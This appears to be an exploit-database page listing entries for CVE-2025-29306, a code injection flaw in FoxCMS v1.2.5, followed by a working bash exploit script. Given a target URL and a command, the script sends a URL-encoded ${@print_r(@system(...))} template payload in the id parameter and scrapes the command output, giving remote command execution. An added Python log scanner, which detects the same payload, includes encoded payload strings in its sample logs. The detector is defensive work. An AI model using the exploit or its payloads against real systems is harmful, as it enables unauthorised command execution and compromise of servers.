| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Code Injection in Foxcms | 22 Apr 2025 09:00 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 25 Mar 2025 08:12 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 18 Sep 2025 04:53 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 26 Nov 2025 18:13 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 10 May 2025 13:14 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 25 Apr 2025 03:45 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 7 Jan 2026 05:08 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 17 Apr 2025 08:44 | – | githubexploit |
| CVE-2025-29306 | 27 Mar 2025 20:50 | – | circl |
| FoxCMS code injection vulnerability | 27 Mar 2025 00:00 | – | cnnvd |
```bash
#!/bin/bash
# Date: 2025-04-17
# Exploit Title:
# Exploit Author: VeryLazyTech
# Vendor Homepage: https://www.foxcms.org/
# Software Link: https://www.foxcms.cn/
# Version: FoxCMS v.1.2.5
# Tested on: Ubuntu 22.04, Windows Server 2019
# CVE: CVE-2025-29306
# Website: https://www.verylazytech.com

banner() {
cat <<'EOF'
______ _______ ____ ___ ____ ____ ____ ___ _____ ___ __
/ ___\ \ / / ____| |___ \ / _ \___ \| ___| |___ \ / _ \___ / / _ \ / /_
| | \ \ / /| _| __) | | | |__) |___ \ __) | (_) ||_ \| | | | '_ \
| |___ \ V / | |___ / __/| |_| / __/ ___) | / __/ \__, |__) | |_| | (_) |
\____| \_/ |_____| |_____|\___/_____|____/ |_____| /_/____/ \___/ \___/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
@VeryLazyTech - Medium
EOF
}
# Call the banner function
banner
set -e
# Check for correct number of arguments
if [ "$#" -ne 2 ]; then
    printf 'Usage: %s <url> <command>\n' "$0" >&2
    exit 1
fi
TARGET=$1
# Encode payload: the template expression ${@print_r(@system("<command>"))} is URL-encoded and sent in the id parameter
ENCODED_CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('\${@print_r(@system(\"$2\"))}'))")
FULL_URL="${TARGET}?id=${ENCODED_CMD}"
echo "[*] Sending RCE payload: $2"
HTML=$(curl -s "$FULL_URL")
# Extract the <ul> at the known XPath location with xmllint; "|| true" keeps set -e from aborting when the node is absent
UL_CONTENT=$(echo "$HTML" | xmllint --html --xpath "/html/body/header/div[1]/div[2]/div[1]/ul" - 2>/dev/null || true)
# Strip tags, drop blank lines, trim leading whitespace
CLEANED=$(echo "$UL_CONTENT" | sed 's/<[^>]*>//g' | sed '/^$/d' | sed 's/^[[:space:]]*//')
echo
echo "[+] Command Output:"
echo "$CLEANED"
```
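As an added defensive counterpart to the script above (example code, not part of the original exploit or of the Vulners page), the following Python scans web-server access-log lines for the `${...}` template-expression-with-call shape that the exploit URL-encodes into the `id` parameter, decoding repeated percent-encoding before matching. The combined log format, the detection regex and the log lines and IP addresses are all constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in combined log format; not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [17/Apr/2025:08:44:01 +0000] "GET /index.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.11 - - [17/Apr/2025:08:44:02 +0000] "GET /index.php?id=%24%7B%40print_r%28%40system%28%22id%22%29%29%7D HTTP/1.1" 200 6010 "-" "curl/8.5.0"
203.0.113.12 - - [17/Apr/2025:08:44:03 +0000] "GET /news?id=42&page=2 HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
203.0.113.13 - - [17/Apr/2025:08:44:04 +0000] "GET /index.php?id=%2524%257B%2540system%2528%2522id%2522%2529%257D HTTP/1.1" 200 6010 "-" "python-requests/2.31"
"""

# Client IP and the quoted request line of a combined-format entry.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Heuristic (assumed, not from the page): a template-style ${...} expression that
# contains a function call, which covers the ${@print_r(@system("..."))} shape above.
TEMPLATE_CALL_RE = re.compile(r"\$\{[^}]*[\w@]+\s*\(")


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding (double encoding is a common filter-evasion trick)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line: str) -> list[dict]:
    """Return one finding per query parameter whose decoded value looks like a template expression."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    findings = []
    for name, raw in parse_qsl(query, keep_blank_values=True):  # parse_qsl decodes once
        decoded = fully_decode(raw)  # then peel any remaining encoding layers
        if TEMPLATE_CALL_RE.search(decoded):
            findings.append({"ip": m.group("ip"), "param": name, "value": decoded})
    return findings


def scan_log(text: str) -> list[dict]:
    """Scan every non-empty line of an access log and collect findings."""
    return [f for line in text.splitlines() if line.strip() for f in inspect_line(line)]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"[!] {hit['ip']} param={hit['param']!r} value={hit['value']!r}")
```

Run against the constructed sample, the plain `id=12` and `id=42&page=2` requests pass, while the single- and double-encoded template expressions are both reported.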